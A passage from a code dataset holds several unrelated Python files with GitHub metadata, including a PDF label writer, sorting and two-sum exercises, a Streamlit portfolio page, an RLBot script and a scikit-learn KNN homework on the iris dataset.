Args:\n address: a list of address details with list for each line.\n order_id: integer id of order.\n destination: folder path to write file to.\n '''\n self._create_page()\n\n for item in address:\n self._document.cell(\n self._column_width, 2 * self._text_height, str(item), border=0)\n self._document.ln(self._text_height * 1.5)\n\n file_name = destination + '/Address Label ' + \\\n address[0] + ' ' + str(order_id) + '.pdf'\n self._document.output(name=file_name, dest='F')\n","repo_name":"charlie2clarke/megaladon","sub_path":"src/main/order_management/pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38059544042","text":"#!/usr/bin/python3\n\"\"\"\nModule for add_integer method\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"\n Adds two integers\n\n Args:\n a: the first integer\n b: the second integer, defaults to 98 if no input\n\n Raises:\n TypeError: if a or b is not a int or float\n\n Returns:\n The sum of two integers\n \"\"\"\n if type(a) is not int and type(a) is not float:\n raise TypeError(\"a must be an integer\")\n if type(b) is not int and type(b) is not float:\n raise TypeError(\"b must be an integer\")\n if type(a) is float:\n a = int(a)\n if type(b) is float:\n b = int(b)\n return a + b\n","repo_name":"ArthurAbeshouse/holbertonschool-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24305993606","text":"from collections import defaultdict\n\ndef solution(tickets):\n \n path = []\n \n graph = defaultdict(list)\n for start, end in tickets:\n graph[start].append(end)\n \n for airport in graph.keys():\n graph[airport].sort(reverse=True)\n \n stack = [\"ICN\"]\n \n while stack:\n \n top = stack.pop()\n \n if top not in graph or not graph[top]:\n path.append(top)\n \n else:\n stack.append(top)\n stack.append(graph[top].pop())\n \n return path[::-1]\n \n \n \n","repo_name":"soob511/algostudy","sub_path":"2023/0420/PS_여행경로_김주은.py","file_name":"PS_여행경로_김주은.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"25806919535","text":"import streamlit as st\nimport pandas\n\n# st.set_page_config(layout=\"wide\")\n\nwith st.container():\n col1, col2 = st.columns(2)\n\n with col1:\n st.image(\"images/photo.jpg\")\n\n with col2:\n st.title(\"Andrei Bindasov\")\n content = \"\"\"\n Hi, I am a man: Andrei! I am a programmer, linguist, coach and a teacher. I graduated in 1996 with \n MD in Computer Science & BD in Linguistics.\n \"\"\"\n st.write(content)\n\nst.write(\"Below you can find python showcase projects. Feel free to contact me.\")\n\ncol3, e_col, col4 = st.columns([1.5, 0.5, 1.5])\n\nd_file = pandas.read_csv(\"data.csv\", sep=\";\")\n\nwith col3:\n for idx, row in d_file[0:10].iterrows():\n st.header(row[\"title\"])\n st.write(row[\"description\"])\n st.image(\"images/\" + row[\"image\"])\n st.write(f\"[Source Code]({row['url']})\")\n\nwith col4:\n for idx, row in d_file[10:] .iterrows():\n st.header(row[\"title\"])\n st.write(row[\"description\"])\n st.image(\"images/\" + row[\"image\"])\n st.write(f\"[Source Code]({row['url']})\")\n","repo_name":"andreibindasov/python-showcase","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19933772684","text":"import criarvetor\r\nimport time\r\n\r\ndef heapify(a, n, i):\r\n maior = i\r\n Dir = 2 * i + 1\r\n Esq = 2 * i + 2\r\n\r\n if Esq < n and a[maior] < a[Esq]:\r\n maior = Esq\r\n if Dir < n and a[maior] < a[Dir]:\r\n maior = Dir\r\n if maior != i:\r\n a[i], a[maior] = a[maior], a[i]\r\n heapify(a, n, maior)\r\n\r\ndef heapsort(a, n):\r\n for i in range(n//2-1, -1, -1):\r\n heapify(a, n, i)\r\n for i in range(n-1, 0, -1):\r\n a[i], a[0] = a[0], a[i]\r\n heapify(a, i , 0)\r\n\r\nvetor = []\r\nvetor = criarvetor.arquivo_vetor(vetor)\r\n\r\nprint(\"\\nVetor original:\", vetor)\r\nprint(\"\\nO vetor deve ser:\\n1 - desordenado\\n2 - ordenado (crescente)\\n3 - ordenado (decrescente)\")\r\nflag = int(input())\r\nif flag == 2:\r\n vetor.sort()\r\n print(\"\\nVetor crescente:\", vetor)\r\nelif flag == 3:\r\n vetor.sort(reverse=True)\r\n print(\"\\nVetor decrescente:\", vetor)\r\ninicio = time.time()\r\nheapsort(vetor, len(vetor))\r\nfim = time.time()\r\n\r\nprint(\"\\nVetor ordenado:\", vetor)\r\nprint(\"Tempo de execução:\", (fim - inicio)*1000, \"ms\")","repo_name":"mjneto/OrdenacaoPython","sub_path":"heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"4879249468","text":"# Given an array of integers nums and an integer target, return indices\n# of the two numbers such that they add up to target.\n\n# You may assume that each input would have exactly one solution, and you\n# may not use the same element twice.\n\n# You can return the answer in any order.\n\n# Input Format\n\n# The First Line contains an Integer N\n# The Second Line contains N integers representing the array elements.\n# The Third Line contains an Integer denoting the value of target.\n# Constraints\n\n# 2 <= nums.length <= 10^5\n# -10^9 <= nums[i] <= 10^9\n# -10^9 <= target <= 10^9\n# Only one valid answer exists.\n# Output Format\n\n# Print the Indexes of two integers whose sum is equal to target\n\n# Sample Input 0\n\n# 3\n# 3 2 4\n# 6\n# Sample Output 0\n\n# 1 2\n# Sample Input 1\n\n# 7\n# 4272383 -943113 -466257 -458745 -474695 42855686 -280096\n# 47128069\n# Sample Output 1\n\n# 0 5\n\n\nn = int(input())\nnums = list(map(int, input().split()))\ntarget = int(input())\n\n# Create a dictionary to store the complements of each number\ncomplements = {}\n\n# Loop through the list of numbers\nfor i in range(n):\n # Check if the complement of the current number is in the dictionary\n complement = target - nums[i]\n if complement in complements:\n # If it is, return the indices of the two numbers\n print(complements[complement], i)\n break\n else:\n # If it isn't, add the current number and its index to the dictionary\n complements[nums[i]] = i\n","repo_name":"PerumallaDharan/ISCP","sub_path":"Hackerrank/Apr2023-CCC_SRM_AP-ISCP_03-Test_Y_01/Amazon_1.py","file_name":"Amazon_1.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25253691448","text":"#Using a windows terminal? Run \"CHCP 65001\" before this script to enable Unicode Character being printed to the terminal.\n\nfrom nltk.corpus import webtext, stopwords\n#from nltk.stem.porter import PorterStemmer\nimport pickle\n\nstopWords = set(stopwords.words('english'))\ncorpus = webtext\n#stemmer = PorterStemmer()\n\nsentences = [[token.lower() for token in s if token.isalpha() and token not in stopWords] for s in webtext.sents()]\n#sentences = [[stemmer.stem(token.lower()) for token in s if token.isalpha()] for s in webtext.sents()]\n\nwords = set([word for sen in sentences for word in sen])\n\ncoocMap = {}\n\ndef addToMap(coocMap,w1,w2,val):\n if w1 in coocMap:\n if w2 in coocMap[w1]:\n coocMap[w1][w2] += val\n else:\n coocMap[w1][w2] = val\n else:\n coocMap[w1] = {w2:val}\n return coocMap\n\ndef get(coocMap,w1,w2):\n if w1 in coocMap and w2 in coocMap[w1]:\n return coocMap[w1][w2]\n else:\n return None\n\nfor sen in sentences:\n for idx1 in range(len(sen)):\n w1 = sen[idx1]\n for idx2 in range(idx1+1,len(sen)):\n w2 = sen[idx2]\n coocMap = addToMap(coocMap,w1,w2,1)\n coocMap = addToMap(coocMap,w2,w1,1)\n\nwith open('coocMap.pickle','wb') as f:\n pickle.dump(coocMap,f)\n\nprint(coocMap)\n","repo_name":"remkoboschker/computational-semantics","sub_path":"project2/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"274198115","text":"import numpy as np\nfrom regression.inertia import plot_results as pr\nimport matplotlib.pyplot as plt\nfrom mlhalos import parameters\nfrom scipy import stats\n\nif __name__ == \"__main__\":\n path_inertia = \"/Users/lls/Documents/mlhalos_files/regression/inertia/\"\n path_shear = \"/Users/lls/Documents/mlhalos_files/regression/shear/\"\n path_density = \"/Users/lls/Documents/mlhalos_files/regression/in_halos_only/log_m_output/even_radii_and_random/\"\n\n # inertia\n\n inertia_log_true_mass = np.load(path_inertia + \"true_halo_mass.npy\")\n bins_plotting = np.linspace(inertia_log_true_mass.min(), inertia_log_true_mass.max(), 15, endpoint=True)\n\n den_plus_inertia = np.load(path_inertia + \"inertia_plus_den/predicted_halo_mass.npy\")\n den_plus_inertia_log = np.log10(den_plus_inertia)\n\n # pf.get_violin_plot(bins_plotting, all_log_predicted_mass, all_log_true_mass, return_mean=False, label_distr=\"All\")\n # plt.savefig(path + \"violins.png\")\n\n # shear\n\n shear_log_true_mass = np.load(path_shear + \"true_halo_mass.npy\")\n\n shear_predicted_mass = np.load(path_shear + \"predicted_halo_mass.npy\")\n shear_log_predicted_mass = np.log10(shear_predicted_mass)\n\n # density\n\n den_true = np.load(path_density + \"true_halo_mass.npy\")\n den_predicted = np.load(path_density + \"predicted_halo_mass.npy\")\n log_den_true = np.log10(den_true)\n log_den_predicted = np.log10(den_predicted)\n\n\n ####################### Radii bins analysis particles only #######################\n\n testing_ids = np.load(\n \"/Users/lls/Documents/mlhalos_files/regression/in_halos_only/log_m_output/even_radii_and_random/testing_ids.npy\")\n\n radii_properties_in = np.load(\"/Users/lls/Documents/mlhalos_files/stored_files/radii_stuff/radii_properties_in_ids.npy\")\n radii_properties_out = np.load(\n \"/Users/lls/Documents/mlhalos_files/stored_files/radii_stuff/radii_properties_out_ids.npy\")\n fraction = np.concatenate((radii_properties_in[:, 2], radii_properties_out[:, 2]))\n ids_in_halo = np.concatenate((radii_properties_in[:, 0], radii_properties_out[:, 0]))\n\n # inner radii\n\n inner_ids = ids_in_halo[fraction < 0.3]\n inner_ids = inner_ids.astype(\"int\")\n\n ids_inner_tested = np.in1d(testing_ids, inner_ids)\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_inner_tested], inertia_log_true_mass[ids_inner_tested],\n shear_log_predicted_mass[ids_inner_tested], inertia_log_true_mass[ids_inner_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"shear\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"inner_particles_vs_shear.pdf\"\n )\n plt.clf()\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_inner_tested], inertia_log_true_mass[ids_inner_tested],\n log_den_predicted[ids_inner_tested], log_den_true[ids_inner_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"density\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"inner_particles_vs_density.pdf\"\n )\n plt.clf()\n\n # mid radii\n\n mid_ids = ids_in_halo[(fraction > 0.3) & (fraction < 0.6)]\n mid_ids = mid_ids.astype(\"int\")\n\n ids_mid_tested = np.in1d(testing_ids, mid_ids)\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_mid_tested], inertia_log_true_mass[ids_mid_tested],\n shear_log_predicted_mass[ids_mid_tested], inertia_log_true_mass[ids_mid_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"shear\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"mid_particles_vs_shear.pdf\"\n )\n plt.clf()\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_mid_tested], inertia_log_true_mass[ids_mid_tested],\n log_den_predicted[ids_mid_tested], log_den_true[ids_mid_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"density\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"mid_particles_vs_density.pdf\"\n )\n plt.clf()\n\n # outer\n\n outer_ids = ids_in_halo[(fraction > 0.6) & (fraction < 1)]\n outer_ids = outer_ids.astype(\"int\")\n\n ids_outer_tested = np.in1d(testing_ids, outer_ids)\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_outer_tested], inertia_log_true_mass[ids_outer_tested],\n shear_log_predicted_mass[ids_outer_tested], inertia_log_true_mass[ids_outer_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"shear\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"outer_particles_vs_shear.pdf\"\n )\n plt.clf()\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_outer_tested], inertia_log_true_mass[ids_outer_tested],\n log_den_predicted[ids_outer_tested], log_den_true[ids_outer_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"density\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"outer_particles_vs_density.pdf\"\n )\n plt.clf()\n\n # outer\n\n nonvir_ids = ids_in_halo[fraction > 1]\n nonvir_ids = nonvir_ids.astype(\"int\")\n\n ids_nonvir_tested = np.in1d(testing_ids, nonvir_ids)\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_nonvir_tested], inertia_log_true_mass[ids_nonvir_tested],\n shear_log_predicted_mass[ids_nonvir_tested], inertia_log_true_mass[ids_nonvir_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"shear\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"nonvir_particles_vs_shear.pdf\"\n )\n plt.clf()\n\n pr.violin_plots_density_vs_inertia(den_plus_inertia_log[ids_nonvir_tested], inertia_log_true_mass[ids_nonvir_tested],\n log_den_predicted[ids_nonvir_tested], log_den_true[ids_nonvir_tested],\n bins_plotting,\n label_0=\"den+inertia\",\n compare=\"density\",\n # color=\"grey\",\n path=path_inertia + \"inertia_plus_den/\",\n saving_name=\"nonvir_particles_vs_density.pdf\"\n )\n plt.clf()\n\n\n #### improvement as a function of radius\n\n sorted_ids_in_halo = np.sort(ids_in_halo)\n sorted_fraction = fraction[np.argsort(ids_in_halo)]\n\n fr_tested_ids = sorted_fraction[np.in1d(sorted_ids_in_halo, testing_ids)]\n ic = parameters.InitialConditionsParameters(path=\"/Users/lls/Documents/CODE\", load_final=True)\n\n def frac_diff_predictions_vs_radial_fraction(array_0, array_1, radial_fraction, bins=10, log=True):\n #log_r = np.array([np.inf if x is np.inf else 0 if x == 0 else np.log10(x) for x in radial_fraction])\n # n, b = np.histogram(log_r[~np.isinf(log_r)], bins=bins)\n\n print(type(bins))\n if type(bins) == \"int\":\n if log is True:\n b = np.zeros(bins)\n n_s = np.logspace(np.log10(np.unique(radial_fraction)[1]), np.log10(np.unique(radial_fraction)[-2]), bins-1)\n b[1:] = n_s\n print(b)\n else:\n n, b = np.histogram(radial_fraction[~np.isinf(radial_fraction)], bins=bins)\n print(b)\n else:\n b = bins_arranged\n print(b)\n\n #fractional_diff = (array_0 - array_1)/array_1\n fractional_diff = array_0 - array_1\n\n mean_each_bin = []\n lower_bound = []\n upper_bound = []\n mid_bins = []\n err_each_bin = []\n\n for i in range(len(b) - 1):\n indices_each_bin = np.where((radial_fraction >= b[i]) & (radial_fraction < b[i + 1]))[0]\n indices_each_bin = indices_each_bin.astype(\"int\")\n\n frac_bin = fractional_diff[indices_each_bin]\n if frac_bin.size:\n hist = np.histogram(frac_bin, bins=50)\n hist_dist = stats.rv_histogram(hist)\n\n c_int_lower, c_int_higher = hist_dist.interval(0.68)\n mean_each_bin.append(np.mean(frac_bin))\n lower_bound.append(c_int_lower)\n upper_bound.append(c_int_higher)\n\n # mean, var, std = stats.bayes_mvs(frac_bin)\n # mean_each_bin.append(mean.statistic)\n # median_each_bin.append(np.median(frac_bin))\n # lower_bound.append(mean.minmax[0])\n # upper_bound.append(mean.minmax[1])\n\n mid_bins.append((b[i] + b[i+1])/2)\n else:\n print(\"pass\")\n\n return np.array(mid_bins), np.array(mean_each_bin), np.array(lower_bound), np.array(upper_bound)\n\n def bootstrap_mean_diff(array_0, array_1, radial_fraction, bins=10, log=True):\n #log_r = np.array([np.inf if x is np.inf else 0 if x == 0 else np.log10(x) for x in radial_fraction])\n # n, b = np.histogram(log_r[~np.isinf(log_r)], bins=bins)\n\n print(type(bins))\n if type(bins) == \"int\":\n if log is True:\n b = np.zeros(bins)\n n_s = np.logspace(np.log10(np.unique(radial_fraction)[1]), np.log10(np.unique(radial_fraction)[-2]), bins-1)\n b[1:] = n_s\n print(b)\n else:\n n, b = np.histogram(radial_fraction[~np.isinf(radial_fraction)], bins=bins)\n print(b)\n else:\n b = bins_arranged\n print(b)\n\n fractional_diff = (array_0 - array_1)/array_1\n\n mean_each_bin = []\n error_each_bin = []\n mid_bins = []\n\n for i in range(len(b) - 1):\n indices_each_bin = np.where((radial_fraction >= b[i]) & (radial_fraction < b[i + 1]))[0]\n indices_each_bin = indices_each_bin.astype(\"int\")\n\n frac_bin = fractional_diff[indices_each_bin]\n if frac_bin.size:\n m, error = do_bootstrap_method(frac_bin, 100)\n mean_each_bin.append(m)\n error_each_bin.append(error)\n\n mid_bins.append((b[i] + b[i+1])/2)\n else:\n print(\"pass\")\n\n return np.array(mid_bins), np.array(mean_each_bin), np.array(error_each_bin)\n\n\n bins_arranged = np.concatenate((np.linspace(0, 1, 10, endpoint=False), np.linspace(1, 3, 10)))\n\n\n def do_bootstrap_method(array, bootstrap_number):\n\n mean_bootstrap = np.zeros((bootstrap_number))\n\n for i in range(bootstrap_number):\n random_subset = np.random.choice(array, len(array))\n mean_bootstrap[i] = np.median(random_subset)\n\n return np.mean(mean_bootstrap), np.std(mean_bootstrap)\n\n # single halo\n\n h_indices = np.concatenate([ic.halo[x]['iord'] for x in range(78)])\n h_indices= ic.halo[99]['iord']\n ind = np.in1d(testing_ids, h_indices)\n\n mid_bins_in, m_in, l_in, u_in = frac_diff_predictions_vs_radial_fraction(den_plus_inertia_log[ind],\n log_den_predicted[ind], fr_tested_ids[\n ind], bins=bins_arranged, log=False)\n mid_bins_shear, m_shear, l_shear, u_shear = frac_diff_predictions_vs_radial_fraction(shear_log_predicted_mass[\n ind], log_den_predicted[\n ind], fr_tested_ids[ind], bins=bins_arranged, log=False)\n\n m, me, err = bootstrap_mean_diff(10 ** den_plus_inertia_log[ind], 10 ** log_den_predicted[ind], fr_tested_ids[\n ind], bins=bins_arranged, log=False)\n\n plt.scatter(mid_bins_in, m_in, label=r\"$m_1=$inertia, $m_0=$density\", color=\"b\")\n plt.vlines(mid_bins_in, l_in, u_in, color=\"b\")\n #plt.errorbar(m, me, yerr=err)\n plt.scatter(mid_bins_shear, m_shear, color=\"r\", label=r\"$m_1=$shear, $m_0=$density\")\n plt.vlines(mid_bins_shear, l_shear, u_shear, color=\"r\")\n\n #plt.axvline((bins_fr[1:] + bins_fr[:-1]) / 2, mean_each_bin)\n plt.axhline(y=0, color=\"k\")\n plt.xlabel(r\"$r/\\mathrm{r_{vir}}$\")\n plt.ylabel(r\"$m_1/m_0 - 1$\")\n plt.legend(loc=\"lower right\")\n #plt.xscale(\"log\")\n plt.ylim(-0.5,m_in.max() + 0.2)\n plt.xlim(-0.1, 3.1)\n\n plt.errorbar(mid_bins_in, m_in, yerr=err_in, label=r\"$m_1=$inertia, $m_0=$density\", color=\"b\")\n plt.errorbar(mid_bins_shear, m_shear, yerr=err_shear, color=\"r\", label=r\"$m_1=$shear, $m_0=$density\")\n\n #plt.axvline((bins_fr[1:] + bins_fr[:-1]) / 2, mean_each_bin)\n plt.axhline(y=0, color=\"k\")\n plt.xlabel(r\"$r/\\mathrm{r_{vir}}$\")\n plt.ylabel(r\"$m_1/m_0 - 1$\")\n plt.legend(loc=\"lower right\")\n #plt.xscale(\"log\")\n plt.ylim(-0.5,m_in.max() + 0.2)\n plt.xlim(-0.1, 3.1)\n\n\n\n\n","repo_name":"lluciesmith/mlhalos_code","sub_path":"regression/inertia/radii_bins.py","file_name":"radii_bins.py","file_ext":"py","file_size_in_byte":14494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20088872527","text":"import importlib\nimport time\nimport traceback\nfrom pathlib import Path\nfrom types import ModuleType\n\nfrom rlbot.agents.base_script import BaseScript\nfrom rlbot.matchconfig.loadout_config import LoadoutConfig\nfrom rlbot.matchconfig.match_config import PlayerConfig, MatchConfig, MutatorConfig\nfrom rlbot.setup_manager import SetupManager\n\nimport choreography\n\n\ndef human_config():\n player_config = PlayerConfig()\n player_config.bot = False\n player_config.team = 0\n player_config.name = \"Human\"\n return player_config\n\n\ndef create_player_config(name: str):\n player_config = PlayerConfig()\n player_config.bot = True\n player_config.rlbot_controlled = True\n player_config.name = name\n player_config.team = 0\n player_config.loadout_config = LoadoutConfig()\n player_config.loadout_config.team_color_id = 26\n player_config.loadout_config.decal_id = 306\n player_config.loadout_config.boost_id = 40\n return player_config\n\n\ndef build_match_config():\n match_config = MatchConfig()\n match_config.player_configs = [create_player_config(str(i)) for i in range(63)] + [human_config()]\n match_config.game_mode = 'Soccer'\n match_config.game_map = 'Mannfield'\n match_config.existing_match_behavior = 'Continue And Spawn'\n match_config.mutators = MutatorConfig()\n match_config.mutators.boost_amount = \"Unlimited\"\n match_config.mutators.match_length = \"Unlimited\"\n match_config.enable_state_setting = True\n match_config.enable_rendering = True\n return match_config\n\n\ndef rreload(module):\n \"\"\"Recursively reload modules.\"\"\"\n importlib.reload(module)\n for attribute_name in dir(module):\n attribute = getattr(module, attribute_name)\n if type(attribute) is ModuleType:\n rreload(attribute)\n\n\nclass AirshowSimulator(BaseScript):\n def __init__(self):\n super().__init__(\"Airshow Simulator\")\n self.setup_manager = SetupManager()\n self.setup_manager.game_interface = self.game_interface\n\n while True:\n packet = self.wait_game_tick_packet()\n if packet.game_info.is_round_active:\n break\n\n # copied this from TrackAndField, without this rlbot crashes for some reason\n self.setup_manager.num_participants = 0\n self.setup_manager.launch_bot_processes(MatchConfig())\n\n self.setup_manager.load_match_config(build_match_config())\n self.setup_manager.start_match()\n\n packet = self.wait_game_tick_packet()\n self.choreo = choreography.Choreography(self.game_interface, packet)\n\n self.choreo_file = Path(__file__).parent / \"choreography.py\"\n self.last_mtime = self.choreo_file.lstat().st_mtime\n\n def run(self):\n while True:\n packet = self.wait_game_tick_packet()\n\n # reload choreo if modified\n mtime = self.choreo_file.lstat().st_mtime\n if mtime > self.last_mtime:\n try:\n rreload(choreography)\n self.choreo = choreography.Choreography(self.game_interface, packet)\n print(f\"[{mtime}] Reloaded choreo\")\n self.last_mtime = mtime\n\n except Exception as ex:\n print()\n print(\"-----------------RELOAD EXCEPTION-----------------\")\n print(ex)\n print(traceback.format_exc())\n\n try:\n controls = self.choreo.get_outputs(packet)\n\n except Exception as ex:\n print()\n print(\"-----------------STEP EXCEPTION-----------------\")\n print(ex)\n print(traceback.format_exc())\n\n time.sleep(1.0)\n continue\n\n for index in controls:\n self.game_interface.update_player_input(controls[index], index)\n\n\nif __name__ == '__main__':\n script = AirshowSimulator()\n script.run()\n","repo_name":"Darxeal/airshow-simulator","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11317296497","text":"from sklearn import neighbors, datasets\nfrom sklearn import preprocessing\nfrom sklearn.cross_validation import train_test_split\n\nfrom sklearn.decomposition import PCA\nimport numpy as np\nfrom lib3 import plot\nfrom lib3 import *\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import GridSearchCV\nfrom tabulate import tabulate\n\nprint(\"ML - Homework3 - Marco Treglia\\n\")\ncolors = plt.cm.cool\n\n# 1\niris = datasets.load_iris()\nX = iris.data\ny = iris.target\n\n# 2\nX = preprocessing.scale(X)\npca = PCA(n_components=2)\nX_t = pca.fit_transform(X)\n\n# 3\nX_train, X_test, y_train, y_test = train_test_split(\n X_t, y, test_size=0.40, random_state=100)\n\n\n# 4\naccuracy_list = []\nplt.figure(figsize=(12, 9))\nfor k in range(1, 11):\n title = \"(k= \" + str(k) + \")\"\n print(title)\n clf = neighbors.KNeighborsClassifier(n_neighbors=k)\n clf.fit(X_train, y_train)\n\n plt.subplot(3, 4, k)\n res = 0.01\n plt.title(title)\n plt.grid(True)\n y_min, y_max = X_train[:, 1].min() - 1, X_train[:, 1].max() + 1\n x_min, x_max = X_train[:, 0].min() - 1, X_train[:, 0].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, res), np.arange(y_min, y_max, res))\n Z = clf.predict(np.array([xx.ravel(), yy.ravel()]).T)\n Z = Z.reshape(xx.shape)\n plt.contourf(xx, yy, Z, alpha=0.2, color=colors)\n plt.scatter(X_test[:, 0], X_test[:, 1], c=clf.predict(X_test), cmap=colors)\n\n accuracy_list.append([k, clf.score(X_test, y_test) * 100])\n\nplt.savefig(\"../plot/\" + title + \".png\", dpi=100)\nplt.show()\nprint(accuracy_list)\n\n\naccuracy_list = np.asarray(accuracy_list)\nplt.title(\"Accuracy K 1 to 10\")\nplt.xlabel(\"K\")\nplt.plot(accuracy_list[:, 0], accuracy_list[:, 1], c='blue')\nplt.savefig(\"../plot/\" + \"accuracy\" + \".png\", dpi=100)\nplt.show()\n\n\n# 6\naccuracy_list = []\ntitle = \"\\n3-Class classification (k= 3 weights = uniform)\"\nclf = neighbors.KNeighborsClassifier(n_neighbors=3, weights='uniform')\nclf.fit(X_train, y_train)\nplot(X, X_test, X_train, clf, title)\naccuracy_list.append(['Uniform', clf.score(X_test, y_test)])\n\ntitle = \"\\n3-Class classification (k= 3 weights = distance)\"\nclf = neighbors.KNeighborsClassifier(n_neighbors=3, weights='distance')\nclf.fit(X_train, y_train)\nplot(X, X_test, X_train, clf, title)\naccuracy_list.append(['Distance', clf.score(X_test, y_test)])\nprint(accuracy_list)\n\n\n# Plotting the gaus Fuction\nfunctions = [my_func, my_func1, my_func2, my_func3]\ncolor = ['red', 'blue', 'green', 'black']\nlabel = ['alfa=0.1', 'alfa=10', 'alfa=100', 'alfa=1000']\nx = np.linspace(0, 10, 50)\ninfo1 = []\ninfo1.append(['weight', 'distance'])\ninfo2 = []\ninfo2.append(['weight', 'distance'])\ninfo3 = []\ninfo3.append(['weight', 'distance'])\ninfo4 = []\ninfo4.append(['weight', 'distance'])\n\ninfo_list = [info1, info2, info3, info4]\n\nfor j in range(4):\n y = []\n for i in range(len(x)):\n y.append(functions[j](x[i]))\n info_list[j].append([j, x[i], functions[j](x[i])])\n\n plt.plot(x, np.asarray(y), c=color[j], label=label[j])\n # print(tabulate(info_list[j]))\n plt.legend()\n plt.savefig(\"../plot/\" + \"gauss\" + \".png\", dpi=200)\n plt.show()\n\n\n#7 - 8\naccuracy_list = []\nfunc_title = [\"my_fuction, alfa=0.1\", \"my_fuction, alfa=10\",\n \"my_fuction, alfa=100\", \"my_fuction, alfa=1000\"]\nplt.figure(figsize=(12, 10))\n\nfor k in range(len(functions)):\n title = \"(k= 3, weights = \" + func_title[k] + \" )\"\n clf = neighbors.KNeighborsClassifier(n_neighbors=10, weights=functions[k])\n clf.fit(X_train, y_train)\n res = 0.01\n\n plt.subplot(2, 2, k + 1)\n plt.title(title)\n plt.grid(True)\n\n x_min, x_max = X_train[:, 0].min() - 1, X_train[:, 0].max() + 1\n y_min, y_max = X_train[:, 1].min() - 1, X_train[:, 1].max() + 1\n\n xx, yy = np.meshgrid(np.arange(x_min, x_max, res), np.arange(y_min, y_max, res))\n Z = clf.predict(np.array([xx.ravel(), yy.ravel()]).T)\n Z = Z.reshape(xx.shape)\n plt.contourf(xx, yy, Z, alpha=0.2, color=colors)\n plt.scatter(X_test[:, 0], X_test[:, 1], c=clf.predict(X_test), cmap=colors)\n accuracy_list.append([k, clf.score(X_test, y_test)])\n\nplt.savefig(\"../plot/\" + title + \".png\", dpi=100)\nplt.show()\n\nprint(tabulate(accuracy_list))\naccuracy_list = np.asarray(accuracy_list)\nplt.title(\"Accuracy incrementing alfa from 0.1 to 1000\")\nplt.plot(accuracy_list[:, 0] + 1, accuracy_list[:, 1], c='blue')\nplt.savefig(\"../plot/\" + \"accuracyMyFunc\" + \".png\", dpi=100)\nplt.show()\n\n\nprint(\"Accuracy : \" + str(clf.score(X_test, y_test)) + \". \\n\")\n\n# 10\n\nparam_grid = {'n_neighbors': np.arange(1, 11),\n 'weights': ['uniform', 'distance', my_func, my_func1, my_func2, my_func3],\n 'metric': ['euclidean', 'manhattan']\n }\n\nKN = neighbors.KNeighborsClassifier()\nclf_grid = GridSearchCV(KN, param_grid)\nclf_grid.fit(X_train, y_train)\npredict = clf_grid.predict(X_test)\nacc = clf_grid.best_estimator_.score(X_test, y_test)\n\nplot(X, X_test, X_train, clf_grid.best_estimator_, \"Best Estimator\")\n\nprint(\"Accuracy = \" + str(acc))\n\naccuracy_table = []\nn_neigh = np.arange(1, 11)\nweight = ['uniform', 'distance', my_func, my_func1, my_func2, my_func3]\nmetrics = ['euclidean', 'manhattan']\naccuracy_table.append([\"METRIC\", \"WEIGHT\", \"N-NEIGHT\", \"ACCURACY\"])\n\nfor i in range(len(metrics)):\n for j in range(len(weight)):\n for k in range(len(n_neigh)):\n title = \"KN - Metric : {} | Weight : {} | N_neightbors : {} \".format(\n metrics[i], weight[j], n_neigh[k])\n clf = neighbors.KNeighborsClassifier(\n n_neighbors=n_neigh[k], weights=weight[j], metric=metrics[i])\n clf.fit(X_train, y_train)\n accuracy = clf.score(X_test, y_test)\n accuracy_table.append([metrics[i], weight[j], n_neigh[k], accuracy])\n\n# print(tabulate(accuracy_table, tablefmt='latex', 